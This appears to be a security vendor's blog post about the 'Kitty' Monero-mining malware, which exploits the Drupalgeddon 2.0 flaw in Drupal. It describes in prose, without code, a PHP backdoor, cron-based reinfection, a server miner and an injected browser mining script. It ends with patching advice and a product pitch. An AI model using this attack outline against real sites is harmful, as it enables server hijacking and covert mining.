Drupal Malware: How to Fix Drupal Kitty Cryptomining Malware

Drupal, deemed as one of the most secure CMS around the world has been in news lately for notorious reasons. A malware going by the named “Kitty” has infected Drupal sites making it highly susceptible to mining crypto mining attacks. The malicious script exploits the very well known critical remote-code execution vulnerability in Drupal “Drupalgeddon 2.0”, The Kitty Drupal Malware infects vulnerable Drupal sites to compromise its internal networks and web application servers along with hijacking the browsers of visiting web visitors.

The Drupalgeddon 2.0 vulnerability in Drupal was unearthed in March 2018, affecting versions 7.x and 8.x. This vulnerability arises from insufficient sanitation of arrays objects at Drupal’s core modules, ultimately allowing for remote code execution in Drupal. The flaw provides an entry point for various other Drupal malware, Kitty being one of them.

What is the Drupal Kitty Malware?

The “Kitty” crypto mining malware takes advantage of Drupal sites still vulnerable to “Drupalgeddon 2.0,”  to illegally mine the Monero cryptocurrency. The malicious crypto mining script takes advantage of the highly critical Drupalgeddon 2.0 remote code execution vulnerability (CVE-2018-7600) and targets server as well as browsers. The exploit which was made public in March and is still extant in most versions of Drupal versions 7.x and 8.x.

Drupal Malware: How to Fix Drupal Kitty Cryptomining Malware
Infection Attempt. Image Source: Incapsula

The Drupalgeddon 2.0 vulnerability is caused by insufficient sanitation of arrays objects at Drupal’s core modules, which allows for remote code execution. The vulnerability exposes Drupal sites to various attack vectors, ultimately leading to backdoor implementations, crypto mining attempts, data theft, and account hijacking.

How does the Kitty Malware work?

After the Kitty bash script is executed, the attacker creates a backdoor by writing the PHP file “kdrupal.php” to the infected server disc.

Drupal Malware: How to Fix Drupal Kitty Cryptomining Malware
kdrupal.php encoded backdoor

The Base64 decoded source code of the above PHP backdoor is infact simple, as the attacker uses a sha512 hash function for protecting its remote authentication.

Drupal Malware: How to Fix Drupal Kitty Cryptomining Malware
kdrupal.php decoded backdoor

The script now registers ‘cronjob’: a time-based job scheduler, to periodically re-download and execute a bash script from a remote host, thus allowing the attacker to reinfect the server and delay updates to infected servers.

Download Secure Coding Practices Checklist for Developers

On gaining complete control of the server, the attacker installs the “kkworker” Monero cryptocurrency miner, a well-known xmrig Monero miner, and executes it.

Drupal Malware: How to Fix Drupal Kitty Cryptomining Malware
Server infection with kkworker

However, the attacker doesn’t stop at one server, rather commands the malware to infect other web resources with a mining script named me0w.js. The attacker does so by altering the index.php file and adding to it the malicious JavaScript me0w.js. In the end, the attacker cheekily asks for his malware to be left alone by printing ‘me0w, don’t delete pls i am a harmless cute little kitty, me0w’

Drupal Malware: How to Fix Drupal Kitty Cryptomining Malware
Injection of index.php by me0w.js

The Kitty malware is regularly updated, where everytime the operator adds a new version note. It appears to be regulated by an organized attacker, who develops the malware like a software product: fixing bugs and releasing new features.

How to Fix the Kitty Drupal Malware?

While the Kitty malware taints Drupal’s reputation for enforcing strictly secure coding practices in its core modules against online vulnerabilities, it is unarguably still one of the most secure CMS in the world.

To tackle already infected websites, the Drupal community is rolling out software updates. Some advice on how to tackle infected Drupal websites and subsequent procedures to follow has been published on the Drupal official site 

Prevention is always better than cure. Following prevention steps can help you ensure a safer environment for your Drupal website’s operations.

  • Perform regular file integrity monitoring: Employ tools like Astra to periodically monitor files on the server and get notified immediately of any changes. Hackers tend to modify files on the server and add malware, and viruses in the core files of your website. Such code can be executed server-side i.e in PHP, Python etc or even on the client’s browser, i.e in JavaScript.
  • Employ Web application firewalls to strip out any malicious web requests before they can do any damage to a potentially vulnerable CMS.
  • Regularly update your CMS: Security patches/updates are often released with newer versions of the CMS. It is highly recommended to routinely scan for new versions and upgrade.
  • Install ALL security patches released by vendors: Almost all CMSs release security patches as and when critical issues are reported. Subscribe to their security mailing lists/RSS feeds and keep your software up to date.

Worried about securing your Drupal site against online attackers? Opt for Astra’s Drupal Security Suite to keep your site from harm’s bay. Subscribe to Astra’s blog on Drupal Security to stay abreast with latest happenings, patch releases, and vulnerability news. 

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Bhagyeshwari Chauhan

An engineering grad and a technical writer, Bhagyeshwari blogs about web security, futuristic tech and space science.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close